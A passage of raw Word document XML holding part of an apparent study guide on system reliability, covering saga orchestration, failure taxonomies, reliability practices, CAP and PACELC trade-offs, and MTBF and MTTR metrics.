    <w:p w14:paraId="15B1FF85" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Orchestration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> A central </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Saga Orchestrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (a dedicated service or workflow engine) explicitly tells each service to execute its local transaction and handles failures by triggering compensating transactions. Easier to monitor (the orchestrator knows the saga's state). The orchestrator itself must be reliable — it's the central coordination point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A4496F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The reliability property of Sagas:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Unlike 2PC, sagas never hold distributed locks. Each service locks only its own resources for the duration of its local transaction. Failures are compensated rather than rolled back via coordinator — no blocking. Individual service failures are isolated — only the failed service's transaction is retried or compensated, not the entire saga.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A22967" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The reliability weakness of Sagas:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Compensating transactions may fail too. Refunding a payment when the payment processor is down requires retry logic and potentially manual intervention. Sagas </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>do not provide isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — between T1 (inventory reserved) and C1 (inventory released), other sagas can see the reserved inventory as unavailable, potentially causing incorrect "out of stock" responses. This is </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dirty reads</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> at the saga level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451B147B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="7F9E09B3">
          <v:rect id="_x0000_i2792" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AED9823" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mental Model Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F259C5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376AB95A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Reliability = Correct Behavior × Sustained Over Time × Under Adversarial Conditions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145582EC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="2F8C4751" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  Failure Taxonomy (engineering response differs per type):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3398AF04" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Crash failure     → Redundancy + automatic failover (well-understood)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037EF5F6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Omission failure  → Timeouts + retries + monitoring (common, manageable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AE991D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Timing failure    → Deadline propagation + SLO-based alerting (often missed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D34B099" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Response failure  → Semantic validation + checksums + testing (hardest)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0967A6DE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Byzantine failure → Consensus algorithms + BFT (expensive, rarely needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6879387C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="0D78E2D6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  The Reliability Engineering Stack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A2F3E5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Prevention   → FMEA, FTA, design reviews, chaos engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13739553" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Detection    → Synthetic monitoring, RUM, distributed tracing, anomaly detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543451D1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Containment  → Bulkheads, circuit breakers, rate limiting, load shedding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76338F65" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Recovery     → Redundancy, automated failover, runbooks, GameDays</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3311190B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Learning     → Blameless post-mortems, action item tracking, runbook updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FA7E82" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="71D40DF3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  Data Reliability Non-Negotiables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F28237A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    WAL          → Every write is logged before applied (crash recovery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E5F76D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Checksums    → Every data page verified on read (silent corruption detection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E521765" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Backups      → Tested, verified, geographically distributed (not just taken)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E584ED7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    PITR         → Any-point-in-time recovery (operational safety net)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD55D15" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Idempotency  → All mutations safe to retry (distributed systems baseline)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1060B357" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="68CCD9BC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  The Human Reliability Stack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C9E5EE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Change management  → Progressive delivery, feature flags, canary deployments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D868CC3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Incident response  → Incident commander role, runbooks, clear communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD3029C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Post-mortems       → Blameless, timeline-driven, systemic root cause, tracked action items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1317F88F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    GameDays           → Regular practice of failure response, validated runbooks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A75048" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    On-call hygiene    → Alert quality over quantity, burn rate &gt; threshold alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BF94D3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="4ABD451C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  The Fundamental Reliability Trade-offs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A111092" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Consistency   ↔  Availability (CAP — during partitions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB5A33A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Strong consistency ↔ Latency (PACELC — always)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6243E161" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Recovery speed ↔ Data durability (RTO vs RPO)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612A22FF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Blast containment ↔ Resource efficiency (bulkheads waste capacity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288D8BE5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Automation speed ↔ Safety (fast automated failover vs risk of wrong failover)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593CA250" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The deepest insight at a senior level: </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reliability is not a property you build in at the end — it is an emergent property of thousands of small, disciplined engineering decisions made throughout the entire development lifecycle.</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Every timeout that's properly calibrated, every health check that's meaningfully implemented, every runbook that's kept current, every post-mortem action item that's completed, every canary deployment that catches a bug before it reaches 100% of users — these are all reliability investments that compound over time. Organizations that achieve high reliability don't have a secret reliability technique — they have a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>culture of reliability engineering</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> where every engineer understands that production systems fail in interesting ways, failures are learning opportunities not blame occasions, and the goal is not to prevent all failures (impossible) but to ensure failures are </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>small, fast to detect, fast to recover from, and never repeated.</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> That is the complete definition of a reliable system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC9E5C6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reliability in System Design — In-Depth Technical Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5580C00F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What Reliability Really Means</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4754E534" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Reliability is the probability that a system will perform its intended function correctly and consistently over a specified period of time, under stated conditions, without failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE9C8FF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The critical distinction from availability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D08E98" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="396"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Availability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> "Is the system responding?" (binary — up or down)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FB1A4A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="396"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reliability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> "Is the system responding </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>correctly</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>consistently</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>?" (quality of service over time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2C3DC8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A system can be available but unreliable — it responds, but gives wrong answers, corrupts data, loses messages, or behaves inconsistently. A vending machine that's always powered on (available) but dispenses the wrong item 20% of the time is unreliable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284B04A3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Formal metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FDB907" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="397"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MTBF (Mean Time Between Failures):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Average time the system operates correctly before a failure occurs. Higher = more reliable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B03D41" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="397"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>MTTR (Mean Time To Repair/Recover):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Average time to restore the system after failure. Lower = faster recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042A95D2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="397"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MTTF (Mean Time To Failure):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> For non-repairable components, the expected lifetime before first failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C25D66" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="397"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Failure Rate (λ):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Number of failures per unit time. λ = 1/MTBF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B85FBA9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Relationship:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1468AD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40006613" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Availability = MTBF / (MTBF + MTTR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A58CDB4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>You can improve availability by either increasing MTBF (fewer failures — reliability) OR decreasing MTTR (faster recovery — resilience). Reliability focuses on the MTBF side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD85452" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="7D5C029B">
          <v:rect id="_x0000_i2931" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6527B723" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. The Nature of Failures — Understanding What Goes Wrong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA9A28A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 Failure Taxonomy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CD6664" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hardware failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DDF781" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="398"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Permanent (hard):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Component is broken and won't recover. Disk head crash, burned capacitor, dead NIC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696CB5ED" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="398"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Intermittent:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Fails sometimes, works other times. Loose connection, overheating under load, failing memory cells (bit flips under stress).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8C296E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="398"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Transient:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Temporary disruption, self-resolving. Cosmic ray bit flip, electrical interference, brief power fluctuation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1E1CC1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Software failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2441F002" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="399"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deterministic (Bohrbugs):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Always reproducible given the same inputs. Off-by-one error, null pointer on a specific code path. Found in testing if tested correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A132AE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="399"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Non-deterministic (Heisenbugs):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Appear intermittently. Race conditions, memory leaks that manifest after days, timing-dependent bugs. Extremely hard to reproduce and fix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1321E84C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
